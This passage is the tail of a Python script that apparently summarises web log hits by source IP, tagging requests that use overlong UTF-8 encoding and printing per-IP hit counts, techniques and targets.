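            row["techniques"].add("overlong-utf8")
    return dict(report)


if __name__ == "__main__":
    for ip, row in summarize(SAMPLE).items():
        print(ip, row["hits"], sorted(row["techniques"]), sorted(row["targets"]))
```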